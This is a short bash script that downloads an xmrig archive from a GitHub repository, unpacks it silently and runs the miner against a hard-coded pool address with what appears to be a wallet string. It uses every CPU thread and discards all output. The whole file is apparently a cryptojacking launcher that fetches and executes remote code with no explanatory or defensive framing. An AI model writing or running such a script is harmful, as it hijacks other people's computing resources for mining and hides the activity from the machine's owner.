#!/bin/bash
A=157.230.255.104:443
B=ZEPHsDAvrXU2igJLGdFhaU7JtLog7nEmPBNT19bJAwjxBcS86Pg2Gjp5wZDqvRfp76V4YSyjYQ3pqV8dWij1LjpT4WP6zYzMRDc
C=GAPLEK
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz >/dev/null 2>&1
./xmrig --url $A --user $B --pass $C --donate-level 1 -a rx/0 -t $(nproc --all) >/dev/null 2>&1
